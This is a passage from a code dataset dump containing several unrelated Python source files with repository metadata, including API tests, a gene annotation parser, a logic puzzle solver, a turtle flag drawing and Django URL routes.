regular person\");\n\t#print manipulate\n\n\t# removes character:\n\t#manipulate.remove_char(\"i\");\n\t#print manipulate;\n\n\t# removes multiple character:\n\t#manipulate.remove_char(\"it\");\n\t#print manipulate;\n\n\t# removes word \n\t#manipulate.remove_words(\"After\");\n\t#print manipulate;\n\n\t# removes multiple word \n\t#manipulate.remove_words(\"After there he\");\n\t#print manipulate;\n\n\t# removes word with specfied character\n\t#manipulate.remove_words_with_char(\"h\");\n\t#print manipulate;\n\n\t# replaces word\n\t#manipulate.replace_word(\"After\", \"abc\");\n\t#print manipulate;\n\n\t# remove repeated words\n\t#manipulate.remove_repeats();\n\t#print manipulate;\n\n\t\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1180,"cells":{"__id__":{"kind":"number","value":2156073599821,"string":"2,156,073,599,821"},"blob_id":{"kind":"string","value":"525af838df69a2a92861bb1faaf2867222a225ec"},"directory_id":{"kind":"string","value":"d88e79d82ef37bc060c915baa29136c3e8acd61f"},"path":{"kind":"string","value":"/test/test_api.py"},"content_id":{"kind":"string","value":"c571b98c1abbf6f7d099a68c13c44f5bdea2981d"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"koolhead17/hypernotes"},"repo_url":{"kind":"string","value":"https://github.com/koolhead17/hypernotes"},"snapshot_id":{"kind":"string","value":"7f6085c8ad6be321cbc3dd1a1f97853b26da4fa8"},"revision_id":{"kind":"string","value":"43073d2cc3503b5f0c6ef50411b66aa362e53459"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-10-12T01:47:11.044708","string":"2016-10-12T01:47:11.044708"},"revision_date":{"kind":"timestamp","value":"2011-08-09T11:48:55","string":"2011-08-09T11:48:55"},"committer_date":{"kind":"timestamp","value":"2011-08-09T11:48:55","string":"2011-08-09T11:48:55"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import json\nfrom hypernotes import web\nfrom hypernotes import logic\n\nTESTDB = 'hypernotes-test'\n\nclass TestApi(object):\n @classmethod\n def setup_class(cls):\n web.app.config['ELASTIC_SEARCH_HOST'] = '127.0.0.1:9200'\n web.app.config['ELASTIC_DB'] = TESTDB\n logic.init_db()\n cls.app = web.app.test_client()\n cls.make_fixtures()\n\n @classmethod\n def teardown_class(cls):\n conn, db = logic.get_conn()\n conn.delete_index(TESTDB)\n\n @classmethod\n def make_fixtures(self):\n self.username = u'tester'\n inuser = {\n 'id': self.username,\n 'fullname': 'The Tester'\n }\n indata = {\n 'title': 'My New Note',\n 
'body': '## Xyz',\n 'tags': ['abc', 'efg'],\n 'owner': self.username\n }\n self.app.post('/api/v1/user', data=json.dumps(inuser))\n out = self.app.post('/api/v1/note', data=json.dumps(indata))\n self.note_id = json.loads(out.data)['id']\n self.thread_name = 'default'\n inthread = {\n 'name': self.thread_name,\n 'title': 'My Test Thread',\n 'description': 'None at the moment',\n 'notes': [ self.note_id ],\n 'owner': self.username\n }\n out = self.app.post('/api/v1/thread', data=json.dumps(inthread))\n self.thread_id = json.loads(out.data)['id']\n\n def test_user(self):\n res = self.app.get('/api/v1/user/%s' % self.username)\n data = json.loads(res.data)\n assert data['fullname'] == 'The Tester', data\n\n def test_note(self):\n res = self.app.get('/api/v1/note/%s' % self.note_id)\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n assert data['body'] == '## Xyz', data\n\n def test_note_search_no_query(self):\n res = self.app.get('/api/v1/note?q=')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 1, count\n\n def test_note_search_2_basic_text(self):\n res = self.app.get('/api/v1/note?q=new')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 1, count\n\n def test_note_search_3_should_not_match(self):\n res = self.app.get('/api/v1/note?q=nothing-that-should-match')\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n count = data['result']['hits']['total']\n assert count == 0, count\n\n def test_thread(self):\n res = self.app.get('/api/v1/thread/%s' % self.thread_id)\n assert res.status_code == 200, res.status\n data = json.loads(res.data)\n assert data['title'] == 'My Test Thread', data\n\n res = self.app.get('/api/v1/%s/thread/%s' % (self.username,\n self.thread_name), follow_redirects=True)\n assert res.status_code == 200, res.status\n data = 
json.loads(res.data)\n assert data['title'] == 'My Test Thread', data\n\n def test_thread_update(self):\n id_ = 'testupdate'\n indata = {\n 'id': id_,\n 'title': 'Abc'\n }\n res = self.app.post('/api/v1/thread', data=json.dumps(indata))\n indata2 = {\n 'id': id_,\n 'title': 'Xyz'\n }\n res = self.app.put('/api/v1/thread/%s' % id_, data=json.dumps(indata2))\n out = logic.Thread.get(id_)\n assert out['title'] == 'Xyz', out\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1181,"cells":{"__id__":{"kind":"number","value":10033043627914,"string":"10,033,043,627,914"},"blob_id":{"kind":"string","value":"6fb8583375ab7029d3863fe4757cd2bb0d90ee1f"},"directory_id":{"kind":"string","value":"8ab66dcf8e91734d730f7799839ceddfa289b4cd"},"path":{"kind":"string","value":"/barnacle-1.0.0/src/parsers/genes/ensembl.py"},"content_id":{"kind":"string","value":"619010af380aafc6d9b30e3e22d36a809e4f94b6"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"ptraverse/gsc"},"repo_url":{"kind":"string","value":"https://github.com/ptraverse/gsc"},"snapshot_id":{"kind":"string","value":"7bbbe67652575b5e7d3ca68e85a213fd7536125d"},"revision_id":{"kind":"string","value":"21e6b699f91cf9604f973d51745c3975cbd8e22c"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-23T17:58:50.910026","string":"2021-01-23T17:58:50.910026"},"revision_date":{"kind":"timestamp","value":"2013-01-03T09:06:05","string":"2013-01-03T09:06:05"},"committer_date":{"kind":"timestamp","value":"2013-01-03T09:06:05","string":"2013-01-03T09:06:05"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nensembl.py\n\nCreated by Readman Chiu\nEdited by Lucas Swanson\nCopyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. 
All rights reserved.\n\"\"\"\n\nimport transcript\nfrom optparse import OptionParser\nimport os, re\n\n#for ensGene.txt from UCSC\nfields_a = {1:\"name\", 2:\"chrom\", 3:\"strand\", 4:\"txStart\", 5:\"txEnd\",\n 6:\"cdsStart\", 7:\"cdsEnd\", 8:\"exonCount\", 9:\"exonStarts\", 10:\"exonEnds\",\n 12:\"alias\"}\n\n#for ensGene_ref.txt created in-house\nfields_b = {0:\"name\", 2:\"chrom\", 3:\"strand\", 4:\"txStart\", 5:\"txEnd\",\n 6:\"cdsStart\", 7:\"cdsEnd\", 8:\"exonCount\", 9:\"exonStarts\", 10:\"exonEnds\",\n 16:\"alias\"}\n\ndef set_fields(file=None, line=None):\n sep = name_field = None\n fields = fields_a\n \n #determine which ensGene file it is\n if file:\n for l in open(file, 'r'):\n line = l\n break\n if line:\n if line[:3].lower() != 'ens':\n fields = fields_a\n sep = \"\\t\"\n name_field = 1\n else:\n fields = fields_b\n sep = \" \"\n name_field = 0\n\n return sep, name_field, fields\n\ndef parse(file):\n txts = []\n sep, name_field, fields = set_fields(file=file)\n \n for line in open(file, 'r'):\n cols = line.rstrip(\"\\n\").split(sep)\n\n if cols[0]:\n txt = transcript.Transcript(cols[name_field])\n \n for i in range(len(cols)):\n if i in fields:\n if fields[i] == 'chrom' and cols[i][:3] != 'chr':\n cols[i] = 'chr' + cols[i]\n \n if i <= 10 or i == 16 or i == 12:\n setattr(txt, fields[i], cols[i])\n\n exonStarts = cols[9].rstrip(',').split(',')\n exonEnds = cols[10].rstrip(',').split(',')\n txt.exons = []\n for e in range(len(exonStarts)):\n #start+1: seems necessary at least for mouse ensembl file\n txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])\n\n #calculate transcript length for coverage\n for exon in txt.exons:\n txt.length += int(exon[1]) - int(exon[0]) + 1\n #print txt.name, txt.exonCount, txt.length, txt.exons[0]\n txts.append(txt)\n\n return txts\n\ndef parse_line(line):\n sep, name_field, fields = set_fields(line=line)\n\n cols = line.rstrip(\"\\n\").split(sep)\n if sep and len(cols) > 1:\n txt = 
transcript.Transcript(cols[name_field])\n \n for i in range(len(cols)):\n if i in fields:\n if fields[i] == 'chrom' and cols[i][:3] != 'chr':\n cols[i] = 'chr' + cols[i]\n \n if i <= 10 or i == 16 or i == 12:\n setattr(txt, fields[i], cols[i])\n\n exonStarts = cols[9].rstrip(',').split(',')\n exonEnds = cols[10].rstrip(',').split(',')\n txt.exons = []\n for e in range(len(exonStarts)):\n txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])\n\n #calculate transcript length for coverage\n for exon in txt.exons:\n txt.length += int(exon[1]) - int(exon[0]) + 1\n\n return txt\n\n return None\n\ndef index(input, output):\n sep, name_field, fields = set_fields(file=input)\n \n indices = {}\n data_file = os.path.abspath(input)\n line_num = 1\n for line in open(input, 'r'):\n cols = line.rstrip().split(sep)\n\n start = int(int(cols[4])/1000)\n end = int(int(cols[5])/1000)\n target = cols[2]\n \n if not re.match('^(chr|scaffold)', target, re.IGNORECASE):\n target = 'chr' + target\n \n #print cols[0],target,start,end\n for n in range(start,end+1):\n index = ':'.join((target,str(n)))\n value = str(line_num)\n\n if not indices.has_key(index):\n indices[index] = [value]\n else:\n indices[index].append(value)\n\n line_num += 1\n\n index_file = open(output, 'w')\n for index in sorted(indices.keys()):\n index_file.write(' '.join((index, ','.join(indices[index]))) + \"\\n\")\n\ndef output(txts, outfile):\n fields = fields_a\n\n list_size = int(fields.keys()[-1])+1\n\n field_idx = {}\n for idx, field in fields.iteritems():\n if field in ('exonStarts', 'exonEnds', 'exonCount'):\n field_idx[field] = idx\n\n out = open(outfile, 'w')\n for i in range(len(txts)):\n txt = txts[i]\n \n data = []\n for idx in range(list_size):\n data.append('NA')\n \n for idx, field in fields.iteritems():\n try:\n value = getattr(txt, field)\n except AttributeError:\n continue\n else:\n data[idx] = str(value)\n\n data[0] = str(i)\n\n data[field_idx['exonStarts']] = ','.join([str(int(i[0])-1) for i in 
txt.exons])\n data[field_idx['exonEnds']] = ','.join([str(i[1]) for i in txt.exons])\n data[field_idx['exonCount']] = str(len(txt.exons))\n \n out.write('\\t'.join(data) + '\\n')\n \n out.close()\n \nif __name__ == '__main__':\n usage = \"Usage: %prog annotation-file\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-i\", \"--index\", dest=\"index\", help=\"index output file\")\n\n (options, args) = parser.parse_args()\n\n if options.index:\n index(args[0], options.index)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1182,"cells":{"__id__":{"kind":"number","value":10170482569770,"string":"10,170,482,569,770"},"blob_id":{"kind":"string","value":"9fe0ecc6438502ba1baa363a7adb9dd9e18e3a08"},"directory_id":{"kind":"string","value":"8c8a50c1c3b01ec920184506eee31bee9165b208"},"path":{"kind":"string","value":"/w7/logicpuzzle.py"},"content_id":{"kind":"string","value":"7b3d6f589035a55eb05adf5fca560d04fa9616e0"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"likhtal/CS212"},"repo_url":{"kind":"string","value":"https://github.com/likhtal/CS212"},"snapshot_id":{"kind":"string","value":"b9231337192dc3627c258da83ffe6e6a51ac5dcf"},"revision_id":{"kind":"string","value":"1968afd8a9757de9f19f00b12973fd0e773964af"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-07T20:29:10.800748","string":"2016-09-07T20:29:10.800748"},"revision_date":{"kind":"timestamp","value":"2012-06-22T18:54:06","string":"2012-06-22T18:54:06"},"committer_date":{"kind":"timestamp","value":"2012-06-22T18:54:06","string":"2012-06-22T18:54:06"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nUNIT 2: Logic Puzzle\n\nYou will write code to solve the following logic puzzle:\n\n1. The person who arrived on Wednesday bought the laptop.\n2. The programmer is not Wilkes.\n3. Of the programmer and the person who bought the droid,\n one is Wilkes and the other is Hamming.\n4. The writer is not Minsky.\n5. Neither Knuth nor the person who bought the tablet is the manager.\n6. Knuth arrived the day after Simon.\n7. The person who arrived on Thursday is not the designer.\n8. The person who arrived on Friday didn't buy the tablet.\n9. The designer didn't buy the droid.\n10. Knuth arrived the day after the manager.\n11. 
Of the person who bought the laptop and Wilkes,\n one arrived on Monday and the other is the writer.\n12. Either the person who bought the iphone or the person who bought the tablet\n arrived on Tuesday.\n\nYou will write the function logic_puzzle(), which should return a list of the\nnames of the people in the order in which they arrive. For example, if they\nhappen to arrive in alphabetical order, Hamming on Monday, Knuth on Tuesday, etc.,\nthen you would return:\n\n['Hamming', 'Knuth', 'Minsky', 'Simon', 'Wilkes']\n\n(You can assume that the days mentioned are all in the same week.)\n\"\"\"\n\nimport itertools\n\ndef logic_puzzle():\n \"Return a list of the names of the people, in the order they arrive.\"\n ## your code here; you are free to define additional functions if needed\n # return ['Wilkes', 'Simon', 'Knuth', 'Hamming', 'Minsky']\n\n days = mon, tue, wed, thu, fri = [1, 2, 3, 4, 5]\n orderings = list(itertools.permutations(days))\n gen = (dict([(h, \"Hamming\"), (k,\"Knuth\"), (m,\"Minsky\"), (s,\"Simon\"), (w, \"Wilkes\")])\n for (h, k, m, s, w) in orderings\n if k == s + 1\n for (programmer, writer, manager, designer, _) in orderings\n if (programmer is not w)\n and (writer is not m)\n and (designer is not thu)\n and (k == manager + 1)\n and (writer is not mon)\n for (laptop, droid, tablet, iphone, _) in orderings\n if (laptop is wed)\n and (tablet is not fri)\n and (w is not laptop)\n and (set([programmer, droid]) == set([w, h]))\n and (programmer is not droid)\n and (manager is not k and manager is not tablet)\n and (designer is not droid)\n and (set([w, laptop]) == set([mon, writer]))\n and (iphone is tue or tablet is tue))\n result = next(gen)\n return [result[key] for key in range(1,6)]\n \nprint 
logic_puzzle()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1183,"cells":{"__id__":{"kind":"number","value":14800457340020,"string":"14,800,457,340,020"},"blob_id":{"kind":"string","value":"7bd281ab8753ced41145b2a3e7a8af86e31a70ad"},"directory_id":{"kind":"string","value":"9fffb8d0539a27722695ee1bf77afda2255f4120"},"path":{"kind":"string","value":"/Python Codes/Project 04.py"},"content_id":{"kind":"string","value":"6610fb275549666fc9f87c4eff1d7c1a2e9c9205"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"mukasama/portfolio"},"repo_url":{"kind":"string","value":"https://github.com/mukasama/portfolio"},"snapshot_id":{"kind":"string","value":"fdde5f1b022cc3d7b5abf1c35e170ad9f5d3f401"},"revision_id":{"kind":"string","value":"92e1d231f76ad7473a2318da87e8b3817a9e4e5b"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-07T15:41:07.331327","string":"2016-09-07T15:41:07.331327"},"revision_date":{"kind":"timestamp","value":"2014-10-19T17:53:42","string":"2014-10-19T17:53:42"},"committer_date":{"kind":"timestamp","value":"2014-10-19T17:53:42","string":"2014-10-19T17:53:42"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind
":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# Section 09\r\n# 10/ 08/ 2012\r\n# Project 04\r\n\r\nimport turtle\r\n\r\nturtle.goto(100,0)\r\n\r\n# Function draw_rectangle, draws a rectangle with desginated lenght and height which then fills in the color(s).\r\ndef draw_rectangle(length,height,color):\r\n\r\n turtle.pendown()\r\n turtle.color(get_color(color))\r\n turtle.begin_fill()\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.end_fill()\r\n turtle.penup()\r\n\r\n# Function draw_rectangle2 draws the outline of the rectangle with same lenght along with the desginated lenght, height and color.\r\ndef draw_rectangle2(length,height,color):\r\n\r\n turtle.pendown()\r\n turtle.color(get_color(color))\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.right(90)\r\n turtle.forward(length)\r\n turtle.right(90)\r\n turtle.forward(height)\r\n turtle.penup()\r\n\r\n# The get_color function is used to determine red, blue and white colors from a parameter color sting.\r\ndef get_color(color):\r\n if color == \"red\":\r\n return 1,0,0\r\n if color == \"blue\":\r\n return 0,0,1\r\n if color == \"white\":\r\n return 1,1,1\r\n if color == \"black\":\r\n return 0,0,0\r\n\r\n# Draw_star function draws a star with desginated angles and lengths which then fills it with the color.\r\ndef draw_star(size, color):\r\n\r\n turtle.pendown()\r\n turtle.begin_fill()\r\n turtle.color(1,1,1)\r\n turtle.forward(2.5) \r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n 
turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.forward(2.5)\r\n turtle.left(size)\r\n turtle.forward(2.5)\r\n turtle.right(144)\r\n turtle.end_fill()\r\n turtle.penup()\r\n\r\n# draw_flag is a function that draws a fag of a certain heing. \r\ndef draw_flag(height):\r\n\r\n size = 72\r\n color = \"white\"\r\n\r\n# Letters \"a\" is just a variable I choose to complete my formula to draw the small blue rectangle.\r\n \r\n for a in range(7):\r\n\r\n turtle.speed(100)\r\n turtle.down()\r\n draw_rectangle(height/13,height*1.9,\"red\")\r\n turtle.right(90)\r\n turtle.forward((height/13)*2)\r\n turtle.left(90)\r\n \r\n draw_rectangle(height, height*1.9, \"white\")\r\n\r\n turtle.goto(100,0)\r\n draw_rectangle2(height,324,\"black\")\r\n \r\n turtle.goto(-93.5, 0)\r\n draw_rectangle(height*.5385,height*.76, \"blue\")\r\n\r\n# Letters b, c, d, e, f, g, h, i, j, k are just variables I choose to complete my formula to draw the 50 stars.\r\n \r\n turtle.goto(-218,-6)\r\n for c in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-16)\r\n for d in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23) \r\n\r\n turtle.goto(-218,-26)\r\n for e in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-36)\r\n for f in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n \r\n turtle.goto(-218,-46)\r\n for g in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n \r\n turtle.goto(-209,-56)\r\n for h in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n\r\n turtle.goto(-218,-66)\r\n for i in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n\r\n turtle.goto(-209,-76)\r\n for j in range(5):\r\n draw_star(size, 'white')\r\n turtle.forward(23)\r\n\r\n turtle.goto(-218,-86)\r\n for k in range(6):\r\n draw_star(size, 'white')\r\n turtle.forward(22)\r\n \r\ndraw_flag(170) 
\r\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1184,"cells":{"__id__":{"kind":"number","value":9259949530741,"string":"9,259,949,530,741"},"blob_id":{"kind":"string","value":"037482b2f1a965d3d7f20a037f1fd8166cefd5e6"},"directory_id":{"kind":"string","value":"83aa3050fe8c3467a9eb6005c5804fbab9497379"},"path":{"kind":"string","value":"/merchant/urls.py"},"content_id":{"kind":"string","value":"f676e5690fc11058167dcca5e8b9a30453d7657f"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"igorlebovic/Mobile-Order-Placement"},"repo_url":{"kind":"string","value":"https://github.com/igorlebovic/Mobile-Order-Placement"},"snapshot_id":{"kind":"string","value":"28e6ab94e5d6359c69997468e290196716addd5a"},"revision_id":{"kind":"string","value":"0064c4c96faf9d5a53769d4ec179f9c96bbf1070"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-08-03T09:35:04.184759","string":"2016-08-03T09:35:04.184759"},"revision_date":{"kind":"timestamp","value":"2011-03-05T07:22:59","string":"2011-03-05T07:22:59"},"committer_date":{"kind":"timestamp","value":"2011-03-05T07:22:59","string":"2011-03-05T07:22:59"},"github_id":{"kind":"number","value":1429277,"string":"1,429,277"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issu
es_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from django.conf.urls.defaults import *\n\nurlpatterns = patterns('speeqeweb.merchant.views',\n (r'^(?P[\\d]+)-(?P[-\\w]+)/$', 'merchant_home'),\n (r'^menu/(?P[\\d]+)/$', 'merchant_menu'),\n (r'^pos/(?P[\\d]+)/$', 'pos'),\n (r'^pos2/(?P[\\d]+)/$', 'pos2'),\n (r'^login/(?P[\\d]+)/$', 'login'),\n (r'^manageorder/(?P[-\\w]+)/$', 'manageorder'),\n (r'^manageorder2/(?P[-\\w]+)/$', 'manageorder2'),\n (r'^manageorder3/(?P[-\\w]+)/$', 'manageorder3'),\n)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1185,"cells":{"__id__":{"kind":"number","value":13159779829639,"string":"13,159,779,829,639"},"blob_id":{"kind":"string","value":"cec712bbde54b52b0a0b67e1a9af60c8bc902fa3"},"directory_id":{"kind":"string","value":"4d31c9548777356e4fca0303f09df311d6df352e"},"path":{"kind":"string","value":"/lib/data/symbol.py"},"content_id":{"kind":"string","value":"72b35d4f01111c3ef02cd28474b29de6a89903bc"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"enki-labs/heck"},"repo_url":{"kind":"string","value":"https://github.com/enki-labs/heck"},"snapshot_id":{"kind":"string","value":"021421ec3df60b952ae472b838e10d8c8cb63e33"},"revision_id":{"kind":"string","value":"5e9d3c1559e54087d1f83507e25ed891e4649695"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-10T19:31:06.706602","string":"2021-01-10T19:31:06.706602"},"revision_date":{"kind":"timestamp","value":"2014-04-26T14:22:17","string":"2014-04-26T14:22:17"},"committer_date":{"kind":"timestamp","value":"2014-04-26T14:22:17","string":"2014-04-26T14:22:17"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"\"\"\"\nInstrument class accessing metadata, mappings etc.\n\n\"\"\"\n\nfrom lib import common\nfrom lib import schema\n\ndef get_reuters (symbol):\n \"\"\" Get an instrument using a Reuters symbol \"\"\"\n symbol_resolve = schema.table.symbol_resolve\n args = and_(symbol_resolve.columns.symbol==symbol, symbol_resolve.columns.source==\"reuters\")\n matches = schema.select(symbol_resolve, args)\n if matches.rowcount == 0:\n raise Exception(\"Cannot map Reuters instrument %s\" % symbol)\n return Series(matches.fetchone()[2])\n\ndef get (symbol, create):\n \"\"\" Get symbol definition \"\"\"\n symbol_instance = 
schema.select_one(\"symbol\", schema.table.symbol.symbol==symbol)\n if symbol_instance:\n return symbol_instance\n elif create:\n symbol_instance = schema.table.symbol()\n symbol_instance.symbol = symbol\n return symbol_instance\n else:\n raise Exception(\"Unknown symbol (%s)\", symbol)\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1186,"cells":{"__id__":{"kind":"number","value":14139032373315,"string":"14,139,032,373,315"},"blob_id":{"kind":"string","value":"975a62f63da8ece923d0d3770343280bdbecf874"},"directory_id":{"kind":"string","value":"6be742824b1f4dd5f87b6afc63d823ad984c22e3"},"path":{"kind":"string","value":"/tests/__init__.py"},"content_id":{"kind":"string","value":"fec3b79eb679e0547d5d34218b0aea99ef724534"},"detected_licenses":{"kind":"list like","value":["AGPL-3.0-only"],"string":"[\n 
\"AGPL-3.0-only\"\n]"},"license_type":{"kind":"string","value":"non_permissive"},"repo_name":{"kind":"string","value":"BlackFlagConsortium/makershop"},"repo_url":{"kind":"string","value":"https://github.com/BlackFlagConsortium/makershop"},"snapshot_id":{"kind":"string","value":"d584c423aa9ad06c51ff772d5e25dbbaa21bf555"},"revision_id":{"kind":"string","value":"01bfb465538f28bbe20489887355af6c0bb4a5c1"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-10T21:18:44.391962","string":"2021-01-10T21:18:44.391962"},"revision_date":{"kind":"timestamp","value":"2013-11-06T19:47:34","string":"2013-11-06T19:47:34"},"committer_date":{"kind":"timestamp","value":"2013-11-06T19:47:34","string":"2013-11-06T19:47:34"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"